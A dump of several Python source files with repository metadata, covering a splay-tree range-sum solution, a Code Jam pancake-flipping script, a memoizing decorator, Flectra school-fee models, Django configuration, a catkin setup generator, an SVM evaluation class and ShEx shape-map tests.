parent.right = m
self.update(parent)
self.update(v)
v.parent = grandparent
if grandparent != None:
if grandparent.left == parent:
grandparent.left = v
else:
grandparent.right = v
def bigRotation(self, v):
if v.parent.left == v and v.parent.parent.left == v.parent:
# Zig-zig
self.smallRotation(v.parent)
self.smallRotation(v)
elif v.parent.right == v and v.parent.parent.right == v.parent:
# Zig-zig
self.smallRotation(v.parent)
self.smallRotation(v)
else:
# Zig-zag
self.smallRotation(v)
self.smallRotation(v)
# Makes splay of the given vertex and makes
# it the new root.
def splay(self, v):
if v == None:
return None
while v.parent != None:
if v.parent.parent == None:
self.smallRotation(v)
break
self.bigRotation(v)
return v
# Searches for the given key in the tree with the given root
# and calls splay for the deepest visited node after that.
# Returns pair of the result and the new root.
# If found, result is a pointer to the node with the given key.
# Otherwise, result is a pointer to the node with the smallest
# bigger key (next value in the order).
# If the key is bigger than all keys in the tree,
# then result is None.
def find(self, root, key):
v = root
last = root
next = None
while v != None:
if v.key >= key and (next == None or v.key < next.key):
next = v
last = v
if v.key == key:
break
if v.key < key:
v = v.right
else:
v = v.left
root = self.splay(last)
return (next, root)
def split(self, root, key):
(result, root) = self.find(root, key)
if result == None:
return (root, None)
right = self.splay(result)
left = right.left
right.left = None
if left != None:
left.parent = None
self.update(left)
self.update(right)
return (left, right)
def merge(self, left, right):
if left == None:
return right
if right == None:
return left
while right.left != None:
right = right.left
right = self.splay(right)
right.left = left
self.update(right)
return right
class SetRange:
# Code that uses splay tree to solve the problem
root = None
S = SplayTree()
def insert(self, x):
(left, right) = self.S.split(self.root, x)
new_vertex = None
if right == None or right.key != x:
new_vertex = Vertex(x, x, None, None, None)
self.root = self.S.merge(self.S.merge(left, new_vertex), right)
def erase(self, x):
if self.search(x) is None:
return
self.S.splay(self.root)
self.root = self.S.merge(self.root.left, self.root.right)
if self.root is not None:
self.root.parent = None
def search(self, x):
# Implement find yourself
result, self.root = self.S.find(self.root, x)
if result is None or self.root.key != x:
return None
return result.key
def sum(self, fr, to):
(left, middle) = self.S.split(self.root, fr)
(middle, right) = self.S.split(middle, to + 1)
ans = 0
# Complete the implementation of sum
if middle is None:
ans = 0
self.root = self.S.merge(left, right)
else:
ans = middle.sum
self.root = self.S.merge(self.S.merge(left, middle), right)
return ans
def get_tree(self):
print(self.root.key)
self._get_tree(self.root)
def _get_tree(self, root):
if root:
self._get_tree(root.left)
print(root.key)
self._get_tree(root.right)
def main():
MODULO = 1000000001
n = int(stdin.readline())
last_sum_result = 0
s = SetRange()
for i in range(n):
line = stdin.readline().split()
if line[0] == '+':
x = int(line[1])
s.insert((x + last_sum_result) % MODULO)
elif line[0] == '-':
x = int(line[1])
s.erase((x + last_sum_result) % MODULO)
elif line[0] == '?':
x = int(line[1])
print('Found' if s.search((x + last_sum_result) % MODULO) is not None else 'Not found')
elif line[0] == 's':
l = int(line[1])
r = int(line[2])
res = s.sum((l + last_sum_result) % MODULO, (r + last_sum_result) % MODULO)
print(res)
last_sum_result = res % MODULO
elif line[0] == 'c':
s.get_tree()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
871f3e48a561c6d3a0a81e78fb26e52f6fa2eb7c
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_2/gavicharla/codejam1.py
|
25da9175da664053709c8d25e93ab4bca77cade7
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 |
Python
|
UTF-8
|
Python
| false | false | 515 |
py
|
def flip(s,l):
str1 = []
for i in range(l):
if(s[i] == '-'):
str1.append('+')
else:
str1.append('-')
return "".join(str1)
test_cases = int(raw_input())
for test in range(test_cases):
s = raw_input()
l = len(s)
count = l
let =0
while ('-' in s):
let+=1
last_m = s[:count].rfind("-")
s = flip(s[:last_m+1],last_m+1)+s[last_m+1:]
count = s.rfind("+")
print "case #"+str(test+1)+": "+str(let)
|
[
"[[email protected]]"
] | |
f039f11f1012417d425afe36144602e290845663
|
dc182e5b4597bdd104d6695c03744a12ebfe2533
|
/PythonScripts/cache_decorator.py
|
13a86e3faccaa6620f606d3880ecb8559d34a2e1
|
[] |
no_license
|
srinaveendesu/Programs
|
06fb4a4b452445e4260f9691fe632c732078d54d
|
f6dbd8db444678b7ae7658126b59b381b3ab0bab
|
refs/heads/master
| 2023-01-27T14:42:40.989127 | 2023-01-18T22:36:14 | 2023-01-18T22:36:14 | 129,948,488 | 1 | 0 | null | 2022-09-13T23:06:04 | 2018-04-17T18:30:13 |
Python
|
UTF-8
|
Python
| false | false | 404 |
py
|
def cache(func):
"""Keep a cache of previous function calls"""
@functools.wraps(func)
def wrapper_cache(*args, **kwargs):
cache_key = args + tuple(kwargs.items())
if cache_key not in wrapper_cache.cache:
wrapper_cache.cache[cache_key] = func(*args, **kwargs)
return wrapper_cache.cache[cache_key]
wrapper_cache.cache = dict()
return wrapper_cache
|
[
"[email protected]"
] | |
4a37455d9a0b65a8c4aec6586528fc1fcda1e472
|
085d3f2f8de5442d69962a65b8acd79478599022
|
/2.Dictionaries - the root of Python/Safely finding by key.py
|
e66f37889bfe6d285916f26ea00f6830005db3ba
|
[] |
no_license
|
Mat4wrk/Data-Types-for-Data-Science-in-Python-Datacamp
|
bfe8f8c4d4bc3998ef612f0d3137b15e662209d0
|
c2eb30d3c500f69486921d26071a2ef2244e0402
|
refs/heads/main
| 2023-03-13T10:06:10.748044 | 2021-03-07T14:43:25 | 2021-03-07T14:43:25 | 331,574,648 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 260 |
py
|
# Safely print rank 7 from the names dictionary
print(names.get(7))
# Safely print the type of rank 100 from the names dictionary
print(type(names.get(100)))
# Safely print rank 105 from the names dictionary or 'Not Found'
print(names.get(105, 'Not Found'))
|
[
"[email protected]"
] | |
368da12078ad24bb8c1403761b573a5acd4f731c
|
2a54e8d6ed124c64abb9e075cc5524bb859ba0fa
|
/.history/1-Python-Basics/4-bind()-complex_20200412164915.py
|
3951d6e1beff4faa4c6fcf2e2f7923a3bcedeff0
|
[] |
no_license
|
CaptainStorm21/Python-Foundation
|
01b5fbaf7a913506518cf22e0339dd948e65cea1
|
a385adeda74f43dd7fb2d99d326b0be23db25024
|
refs/heads/master
| 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 321 |
py
|
#complex
z = complex(2, -3)
print(z)
z = complex(1)
print(z)
z = complex()
print(z)
z = complex('5-9j')
print(z)
# output
# (2-3j)
# (1+0j)
# 0j
# (5-9j)
#binary
print(bin(5))
# binary output 0b101
#binary with letter b with python
#non-python binary number of 5 is 101
#convert from binary into an integer
print()
|
[
"[email protected]"
] | |
782de249b46f09546dcf741a0fc5f71b7f5aca5e
|
a03303e46f21697c9da87d0bb0f7b0a3077aba5c
|
/siswa_keu_ocb11/models/biaya_ta_jenjang.py
|
8c0710c7ba375eaad0378bdde9362af08f91cddd
|
[] |
no_license
|
butirpadi/flectra_app_sek
|
fccd3e47ef261e116478e6da7f0cc544ee67f127
|
00fa36d9176511f8ffe3c7636a8434ee2ed8c756
|
refs/heads/master
| 2020-04-06T10:26:37.053024 | 2018-11-19T23:59:34 | 2018-11-20T00:17:02 | 157,380,460 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,290 |
py
|
# -*- coding: utf-8 -*-
from flectra import models, fields, api, _
from pprint import pprint
from datetime import datetime, date
import calendar
class biaya_ta_jenjang(models.Model):
_name = 'siswa_keu_ocb11.biaya_ta_jenjang'
name = fields.Char('Name', related="biaya_id.name")
tahunajaran_jenjang_id = fields.Many2one('siswa_ocb11.tahunajaran_jenjang', string='Tahun Ajaran', required=True, ondelete='cascade')
biaya_id = fields.Many2one('siswa_keu_ocb11.biaya', string='Biaya', required=True)
is_different_by_gender = fields.Boolean('Different by Gender', related='biaya_id.is_different_by_gender')
harga = fields.Float('Harga', required=True, default=0)
harga_alt = fields.Float('Harga (Alt)', required=True, default=0)
def recompute_biaya_ta_jenjang(self):
print('recompute biaya ta jenjang')
# get data siswa
rb_sis_ids = self.env['siswa_ocb11.rombel_siswa'].search([
('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
('jenjang_id', '=', self.tahunajaran_jenjang_id.jenjang_id.id),
])
for sis in rb_sis_ids:
siswa = sis.siswa_id
total_biaya = 0
if sis.siswa_id.active:
if self.biaya_id.assign_to == 'all' or (siswa.is_siswa_lama and self.biaya_id.assign_to == 'lama') or (not siswa.is_siswa_lama and self.biaya_id.assign_to == 'baru'):
# if siswa.is_siswa_lama and self.biaya_id.is_siswa_baru_only:
# print('skip')
# else:
print('JENJANG ID : ' + str(self.tahunajaran_jenjang_id.jenjang_id.id))
if self.biaya_id.is_bulanan:
for bulan_index in range(1, 13):
harga = self.harga
if self.biaya_id.is_different_by_gender:
if siswa.jenis_kelamin == 'perempuan':
harga = self.harga_alt
self.env['siswa_keu_ocb11.siswa_biaya'].create({
'name' : self.biaya_id.name + ' ' + calendar.month_name[bulan_index],
'siswa_id' : siswa.id,
'tahunajaran_id' : self.tahunajaran_jenjang_id.tahunajaran_id.id,
'biaya_id' : self.biaya_id.id,
'bulan' : bulan_index,
'harga' : harga,
'amount_due' : harga,
'jenjang_id' : self.tahunajaran_jenjang_id.jenjang_id.id
})
total_biaya += harga
else:
harga = self.harga
if self.biaya_id.is_different_by_gender:
if siswa.jenis_kelamin == 'perempuan':
harga = self.harga_alt
self.env['siswa_keu_ocb11.siswa_biaya'].create({
'name' : self.biaya_id.name,
'siswa_id' : siswa.id,
'tahunajaran_id' : self.tahunajaran_jenjang_id.tahunajaran_id.id,
'biaya_id' : self.biaya_id.id,
'harga' : harga,
'amount_due' : harga,
'jenjang_id' : self.tahunajaran_jenjang_id.jenjang_id.id
})
total_biaya += harga
# set total_biaya dan amount_due
# total_biaya = sum(self.harga for by in self.biayas)
print('ID SISWA : ' + str(siswa.id))
res_partner_siswa = self.env['res.partner'].search([('id', '=', siswa.id)])
self.env['res.partner'].search([('id', '=', siswa.id)]).write({
'total_biaya' : total_biaya,
'amount_due_biaya' : res_partner_siswa.amount_due_biaya + total_biaya,
})
# Recompute Tagihan Siswa Dashboard/ Keuangan Dashboard
self.recompute_dashboard()
def reset_biaya_ta_jenjang(self):
rb_sis_ids = self.env['siswa_ocb11.rombel_siswa'].search([
('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
('jenjang_id', '=', self.tahunajaran_jenjang_id.jenjang_id.id),
])
for sis in rb_sis_ids:
siswa = sis.siswa_id
self.env['siswa_keu_ocb11.siswa_biaya'].search(['&', '&', '&',
('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
('biaya_id', '=', self.biaya_id.id),
('state', '=', 'open'),
('siswa_id', '=', siswa.id),
]).unlink()
# Recompute Tagihan Siswa Dashboard/ Keuangan Dashboard
self.recompute_dashboard()
def recompute_dashboard(self):
dash_keuangan_id = self.env['ir.model.data'].search([('name', '=', 'default_dashboard_pembayaran')]).res_id
dash_keuangan = self.env['siswa_keu_ocb11.keuangan_dashboard'].search([('id', '=', dash_keuangan_id)])
for dash in dash_keuangan:
dash.compute_keuangan()
print('Recompute Keuangan Dashboard done')
@api.model
def create(self, vals):
if not vals['is_different_by_gender']:
vals['harga_alt'] = vals['harga']
result = super(biaya_ta_jenjang, self).create(vals)
return result
@api.multi
def write(self, vals):
self.ensure_one()
# print('isisnya : ')
# pprint(vals)
# # get biaya
# # biaya_ta_jenjang = self.env['siswa_keu_ocb11.biaya_ta_jenjang'].search([('id','=',vals['id'])])
# biaya = self.env['siswa_keu_ocb11.biaya'].search([('id','=',vals['biaya_id'])])
# if not biaya[0].is_different_by_gender: #vals['is_different_by_gender']:
if not self.biaya_id.is_different_by_gender:
if 'harga' in vals:
vals['harga_alt'] = vals['harga']
res = super(biaya_ta_jenjang, self).write(vals)
return res
|
[
"[email protected]"
] | |
53bd002833d9a292adb9fc9597fcf51a13a3e702
|
ff7d3116024c9df01b94191ddfa334e4a6782ae6
|
/mandal/asgi.py
|
b5b92dc813812b64f6029c072cbb314048f69a23
|
[
"MIT"
] |
permissive
|
jhnnsrs/arbeider
|
f5f708ee1026a9e9573a6f8a87c3b9e2fd6b5e33
|
4c5637913331c998a262ae0deca516b236845200
|
refs/heads/master
| 2021-05-26T10:31:16.279628 | 2020-04-08T13:40:26 | 2020-04-08T13:40:26 | 254,095,863 | 0 | 0 |
MIT
| 2020-04-08T13:40:28 | 2020-04-08T13:29:31 | null |
UTF-8
|
Python
| false | false | 318 |
py
|
"""
ASGI entrypoint. Configures Django and then runs the application
defined in the ASGI_APPLICATION setting.
"""
import os
import django
from channels.routing import get_default_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mandal.settings")
django.setup()
application = get_default_application()
|
[
"[email protected]"
] | |
16573c15b3817ed9f64b13f466428536b50da9d6
|
5b4312ddc24f29538dce0444b7be81e17191c005
|
/autoware.ai/1.12.0_cuda/build/waypoint_follower/catkin_generated/generate_cached_setup.py
|
01cfc657005e5167ef4e8abd08b42b76f522be17
|
[
"MIT"
] |
permissive
|
muyangren907/autoware
|
b842f1aeb2bfe7913fb2be002ea4fc426b4e9be2
|
5ae70f0cdaf5fc70b91cd727cf5b5f90bc399d38
|
refs/heads/master
| 2020-09-22T13:08:14.237380 | 2019-12-03T07:12:49 | 2019-12-03T07:12:49 | 225,167,473 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,929 |
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_health_checker;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/amathutils_lib;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/tablet_socket_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_system_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_config_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_build_flags;/opt/ros/melodic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/waypoint_follower/devel/env.sh')
output_filename = '/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/waypoint_follower/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
[
"[email protected]"
] | |
0a8b93c86f1f59ac957d675eef30b726dc06c777
|
52a4d869976a97498bdf56a8d0ff92cac138a136
|
/Algorithmic Heights/rosalind_3_degarray.py
|
1ed82de8791f3769afe522fe22c1bee1abb2a87e
|
[] |
no_license
|
aakibinesar/Rosalind
|
d726369a787d848cc378976b886189978a60a3a5
|
375bbdbfb16bf11b2f980701bbd0ba74a1605cdb
|
refs/heads/master
| 2022-08-18T09:36:00.941080 | 2020-05-24T18:49:38 | 2020-05-24T18:49:38 | 264,722,651 | 0 | 0 | null | 2020-05-17T17:51:03 | 2020-05-17T17:40:59 | null |
UTF-8
|
Python
| false | false | 380 |
py
|
file = open('rosalind_deg.txt','r').readlines()
vertices, edges = (int(val) for val in file[0].split())
my_data = [[int(val) for val in line.split()] for line in file[1:]]
count = 0
L = []
for k in range(1,vertices+1):
count = 0
for i in range(2):
for j in range(0,edges):
if my_data[j][i] == k:
count+=1
L.append(count)
print(' '.join(str(num) for num in L))
|
[
"[email protected]"
] | |
3e677c83fd12cc5c2661147aa8b3dca9d0b689e4
|
15c4278a1a70ad3c842b72cba344f96fca43f991
|
/newpro/newapp/admin.py
|
37dac0ac21c8bfb1c6e0d008a060f3977faa28a0
|
[] |
no_license
|
nivyashri05/Task1
|
d9914cf5bb8947ef00e54f77480c6f5f375c76ad
|
9e9b03961eb1144d1b1a936159082ad80d32ce31
|
refs/heads/master
| 2023-01-06T01:04:17.321503 | 2020-11-10T15:31:02 | 2020-11-10T15:31:02 | 311,691,678 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 434 |
py
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from newapp.models import User
class UserAdmin(BaseUserAdmin):
list_display = ('email','username','phone','is_admin','is_staff','timestamp')
search_fields = ('email','username',)
readonly_fields=('date_joined', 'last_login')
filter_horizontal = ()
list_filter = ()
fieldsets = ()
admin.site.register(User, BaseUserAdmin)
|
[
"[email protected]"
] | |
16d4ac62c0efe8567434b83a272a3035cd8c8990
|
d75371f629cf881de3c49b53533879a5b862da2e
|
/python/search-a-2d-matrix.py
|
3ce6ce1d52b91816fccec4a1e5592f5c548b2cf5
|
[] |
no_license
|
michaelrbock/leet-code
|
7352a1e56429bb03842b588ba6bda2a90315a2f4
|
070db59d4e0ded3fb168c89c3d73cb09b3c4fe86
|
refs/heads/master
| 2020-04-01T05:40:49.262575 | 2019-10-10T22:03:10 | 2019-10-10T22:03:10 | 152,914,631 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,614 |
py
|
def binary_row(rows, target):
if len(rows) == 1:
return 0, None
if len(rows) == 2:
return (1, None) if target >= rows[1] else (0, None)
lo = 0
hi = len(rows)
while lo < hi:
mid = (lo + hi) // 2
if rows[mid] == target:
return mid, True
if mid == len(rows) - 1:
return len(rows) - 1, None
if rows[mid] < target and rows[mid + 1] > target:
return mid, None
elif target > rows[mid]:
lo = mid
else:
hi = mid
return len(rows) - 1, None
def binary_search(lst, target):
if not lst:
return False
if len(lst) == 1:
return lst[0] == target
lo = 0
hi = len(lst)
while lo <= hi:
mid = (lo + hi) // 2
if lst[mid] == target:
return True
elif target > lst[mid]:
if lo == mid:
break
lo = mid
elif target < lst[mid]:
hi = mid
return False
class Solution1:
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix or not matrix[0] or matrix[0][0] > target:
return False
row, result = binary_row([row[0] for row in matrix], target)
if result is not None:
return result
return binary_search(matrix[row], target)
def _translate(index, rows, cols):
"""Returns (row, col) for overall index."""
row = index // cols
col = index % cols
return row, col
class Solution:
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix or not matrix[0]:
return False
# Strategy: binary search, but treat the matrix as if
# it was one long array. Translate overall index into
# row/col indices.
m, n = len(matrix), len(matrix[0]) # num row, num cols
start = 0 # indices as if matrix was one long list
end = m * n - 1 # incluive
while start <= end and start >= 0 and end < m * n:
mid = (start + end) // 2
row, col = _translate(mid, m, n)
if target == matrix[row][col]:
return True
elif target > matrix[row][col]:
start = mid + 1
else: # target < matrix[row][col]
end = mid - 1
return False
s = Solution()
assert not s.searchMatrix([[-10,-8,-8,-8],[-5,-4,-2,0]], 7)
assert s.searchMatrix([[1, 3, 5, 7],[10, 11, 16, 20],[23, 30, 34, 50]], 3)
assert not s.searchMatrix([[1, 3, 5, 7],[10, 11, 16, 20],[23, 30, 34, 50]], 13)
assert not s.searchMatrix([[1, 1]], 0)
assert not s.searchMatrix([[1, 1]], 2)
assert not s.searchMatrix([[-10,-8,-8,-8],[-5,-4,-2,0]], 7)
print('All tests passed!')
|
[
"[email protected]"
] | |
8f9842cabc131fddc1025c2ab9121b0af86a3297
|
d9a65120e6b8d20d3b568acde8ceb66f908d1ffc
|
/django1/src/vote/urls.py
|
68755a03d624470c3b5e239836982709943bda16
|
[] |
no_license
|
omniverse186/django1
|
aba57d705bd7b3a142f627e566853811038d6d6c
|
f257c34c9d09467170a5f3bd24598d97dcf64f4f
|
refs/heads/master
| 2020-04-21T23:11:17.677609 | 2019-02-10T03:20:47 | 2019-02-10T03:20:47 | 169,938,176 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 838 |
py
|
'''
Created on 2019. 1. 20.
@author: user
'''
#하위 URLConf
#app_name : 하위 URLConf 파일의 등록된 URL들의 그룹명
#urlpatterns : URL과 뷰함수를 리스트 형태로 등록하는 변수
from django.urls import path
from .views import *
app_name = 'vote'
urlpatterns = [
#name : 해당 URL, 뷰함수 등록에 대해서 별칭을 지정
path('', index, name= 'index'),
path('<int:q_id>/', detail, name='detail'),
path('vote/', vote, name='vote'),
path('result/<int:q_id>',result, name='result'),
path('qr/', qregister, name='qr' ),
path('qu/<int:q_id>/', qupdate, name = 'qu'),
path('qd/<int:q_id>/', qdelete, name='qd'),
path('cr/', cregister, name='cr'),
path('cu/<int:c_id>/', cupdate, name='cu'),
path('cd/<int:c_id>/', cdelete, name='cd')
]
|
[
"user@DESKTOP-37GULAI"
] |
user@DESKTOP-37GULAI
|
1c98f010be779b0df3ae626d838b4e5e5e86525c
|
d24e06a9fb04ada28de067be1b6be50a7a92f294
|
/Assignment1/svm_test.py
|
c916d079fcf86ddccff119130ecb3486e4f6dee4
|
[] |
no_license
|
sentientmachine/CS7641
|
3960b3e216f1eddc9a782318a9bf3ae38fed1959
|
a9a1369acfdd3e846e311c64498a38c8afd8fcc2
|
refs/heads/master
| 2020-12-25T03:11:46.621886 | 2017-12-24T12:24:14 | 2017-12-24T12:24:14 | 51,779,034 | 0 | 0 | null | 2016-02-15T19:17:10 | 2016-02-15T19:17:10 | null |
UTF-8
|
Python
| false | false | 4,649 |
py
|
import io
import pydotplus
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler, OneHotEncoder, Imputer
#from sklearn.metrics import accuracy_score
from plot_curves import *
class rb_svm_test:
def __init__(self, x_train, x_test, y_train, y_test, x_col_names, data_label, cv):
self.x_train = x_train
self.x_test = x_test
self.y_train = y_train
self.y_test = y_test
self.x_col_names = x_col_names
self.data_label = data_label
self.cv = cv
def run_cv_model(self, C=1.0, degree=3, cache_size=200, do_plot=True):
# use k-fold cross validation
# we need to standardize the data for the KNN learner
pipe_clf = Pipeline([ ('scl', StandardScaler() ),
('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
# resample the test data without replacement. This means that each data point is part of a test a
# training set only once. (paraphrased from Raschka p.176). In Stratified KFold, the features are
# evenly disributed such that each test and training set is an accurate representation of the whole
# this is the 0.17 version
#kfold = StratifiedKFold(y=self.y_train, n_folds=self.cv, random_state=0)
# this is the 0.18dev version
skf = StratifiedKFold(n_folds=self.cv, random_state=0)
# do the cross validation
train_scores = []
test_scores = []
#for k, (train, test) in enumerate(kfold):
for k, (train, test) in enumerate(skf.split(X=self.x_train, y=self.y_train)):
# run the learning algorithm
pipe_clf.fit(self.x_train[train], self.y_train[train])
train_score = pipe_clf.score(self.x_train[test], self.y_train[test])
train_scores.append(train_score)
test_score = pipe_clf.score(self.x_test, self.y_test)
test_scores.append(test_score)
print('Fold:', k+1, ', Training score:', train_score, ', Test score:', test_score)
train_score = np.mean(train_scores)
print('Training score is', train_score)
test_score = np.mean(test_scores)
print('Test score is', test_score)
if do_plot:
self.__plot_learning_curve(pipe_clf)
return train_score, test_score
def run_model(self, C=1.0, degree=3, cache_size=200, do_plot=True):
# we need to standardize the data for the learner
pipe_clf = Pipeline([ ('scl', StandardScaler() ),
('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
# test it: this should match the non-pipelined call
pipe_clf.fit(self.x_train, self.y_train)
# check model accuracy
train_score = pipe_clf.score(self.x_train, self.y_train)
print('Training score is', train_score)
test_score = pipe_clf.score(self.x_test, self.y_test)
print('Test score is', test_score)
if do_plot:
self.__plot_learning_curve(pipe_clf)
self.__plot_decision_boundaries(pipe_clf)
return train_score, test_score
def __plot_learning_curve(self, estimator):
plc = rb_plot_curves()
plc.plot_learning_curve(estimator, self.x_train, self.y_train, self.cv, self.data_label)
def plot_validation_curve(self, C=1.0, degree=3, cache_size=200):
estimator = Pipeline([ ('scl', StandardScaler() ),
('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
param_names = ['clf__C']
param_ranges = [np.arange(1.0,10.0,1.)]
data_label = self.data_label
plc = rb_plot_curves()
for i in range(len(param_names)):
param_name = param_names[i]
param_range = param_ranges[i]
plc.plot_validation_curve(estimator, self.x_train, self.y_train,
self.cv, data_label,
param_range, param_name)
def __plot_decision_boundaries(self, estimator):
plc = rb_plot_curves()
features = pd.DataFrame(self.x_train)
features.columns = self.x_col_names
plc.plot_decision_boundaries(estimator, features, self.y_train, self.data_label)
|
[
"="
] |
=
|
a688ca2e222977722e0df277f47979059d2e8e1b
|
99eb4013a12ddac44042d3305a16edac1c9e2d67
|
/test/test_raw_shape_map.py
|
1a6b72fc298a5b35beaa25426e64cdf336fc34fa
|
[
"Apache-2.0"
] |
permissive
|
DaniFdezAlvarez/shexer
|
cd4816991ec630a81fd9dd58a291a78af7aee491
|
7ab457b6fa4b30f9e0e8b0aaf25f9b4f4fcbf6d9
|
refs/heads/master
| 2023-05-24T18:46:26.209094 | 2023-05-09T18:25:27 | 2023-05-09T18:25:27 | 132,451,334 | 24 | 2 |
Apache-2.0
| 2023-05-03T18:39:57 | 2018-05-07T11:32:26 |
Python
|
UTF-8
|
Python
| false | false | 4,212 |
py
|
import unittest
from shexer.shaper import Shaper
from test.const import G1, BASE_FILES, default_namespaces
from test.t_utils import file_vs_str_tunned_comparison
import os.path as pth
from shexer.consts import TURTLE
_BASE_DIR = BASE_FILES + "shape_map" + pth.sep
class TestRawShapeMap(unittest.TestCase):
def test_node(self):
shape_map = "<http://example.org/Jimmy>@<Person>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "a_node.shex",
str_target=str_result))
def test_prefixed_node(self):
shape_map = "ex:Jimmy@<Person>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "a_node.shex",
str_target=str_result))
def test_focus(self):
shape_map = "{FOCUS a foaf:Person}@<Person>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_nodes.shex",
str_target=str_result))
def test_focus_wildcard(self):
shape_map = "{FOCUS foaf:name _}@<WithName>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_and_wildcard.shex",
str_target=str_result))
def test_sparql_selector(self):
shape_map = "SPARQL \"select ?p where { ?p a foaf:Person }\"@<Person>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_nodes.shex",
str_target=str_result))
def test_several_shapemap_items(self):
shape_map = "{FOCUS a foaf:Person}@<Person>\n{FOCUS a foaf:Document}@<Document>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "several_shm_items.shex",
str_target=str_result))
|
[
"[email protected]"
] | |
3e034a11bde11aa6a40bca38c774c9dba4dc8ef4
|
9b422078f4ae22fe16610f2ebc54b8c7d905ccad
|
/xlsxwriter/test/comparison/test_chart_format07.py
|
45e9369b2bac7462c137134173b1cda4559f1696
|
[
"BSD-2-Clause-Views"
] |
permissive
|
projectsmahendra/XlsxWriter
|
73d8c73ea648a911deea63cb46b9069fb4116b60
|
9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45
|
refs/heads/master
| 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 |
NOASSERTION
| 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null |
UTF-8
|
Python
| false | false | 1,582 |
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
